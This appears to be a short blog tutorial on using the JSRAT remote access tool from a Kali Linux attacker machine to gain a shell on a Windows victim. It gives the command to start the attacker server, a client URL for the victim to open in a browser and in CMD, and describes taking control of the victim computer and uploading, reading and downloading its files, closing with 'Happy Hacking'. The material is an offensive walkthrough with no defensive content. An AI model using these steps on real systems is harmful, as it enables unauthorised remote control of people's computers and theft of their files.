We are going to use kali linux ( Attacker Machine) and Windows (victim Machine) to show try the attack.
Installation & Setup :
- You can download the JSRAT tool Here
2. Next you download and give appropriate permission to execute the script. Above figure shows the complete installation from github.
Starting the web server:
Now lets start the web server
3. Run and execute the command in the terminal: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080
4. JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf
5. Open this Client command URL with Victim browser
6. To gain the shell payload generated by URL should be opened with CMD.
7. Once the command is executed a shell will be obtained.
8. When we go back to the attacker machine, bingo!!! Here we go !!! We have connected with Victim machine and get hold of the computer.
We can try some windows command to do anything we want with the system. Commands like ipconfig.
JSRat can also provide upload, Read and Download files.Happy Hacking!!!
Felix Onyenobi is a technology enthusiast and loves to write. He is a co-founder at SkyNet Digital Agency. Also a web developer, Penetration tester and ethical hacker.